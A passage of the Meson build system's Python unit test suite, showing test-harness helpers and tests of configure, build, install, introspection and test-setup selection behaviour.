self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path; otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs, CI will just abort. It is very hard to distinguish
# between a CI issue and a test bug in that case. Set a timeout and fail
# loudly instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# substitute them in as the command for each compile command in the parsed JSON.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list of command lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
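# Illustrative note: the platform-specific behaviour comes from PurePath
# comparison itself, e.g. on Windows PurePath('a/b') and PurePath('A\\b')
# compare equal (separators and case are normalized) while on POSIX they
# do not.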
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
            logged = [Path(l.strip()) for l in f.readlines()
                      if not l.startswith('#')]
for name in logged:
            self.assertIn(name, expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
        self.assertNotIn('TEST_ENV is set', basic_log)
        self.assertNotIn('Memcheck', basic_log)
        self.assertIn('TEST_ENV is set', vg_log)
        self.assertIn('Memcheck', vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
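        '''Test that test setups are selected per (sub)project and that
        selecting a setup missing from the chosen suites is an error.'''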
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
        # Running tests without --setup causes the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
        self.assertIn('ENV_A is 1', default_log)
        self.assertIn('ENV_B is 2', default_log)
        self.assertIn('ENV_C is 2', default_log)
        self.assertIn('ENV_A is 1', mydefault_log)
        self.assertIn('ENV_B is 2', mydefault_log)
        self.assertIn('ENV_C is 2', mydefault_log)
        self.assertIn('ENV_A is 1', other_log)
        self.assertIn('ENV_B is 3', other_log)
        self.assertIn('ENV_C is 2', other_log)
def assertFailedTestCount(self, failure_count, command):
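        '''Run the given test command and assert that exactly failure_count
        tests fail (meson test exits with the number of failed tests).'''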
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
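        '''Test --suite/--no-suite selection by checking how many tests fail
        for each combination of included and excluded suites.'''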
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
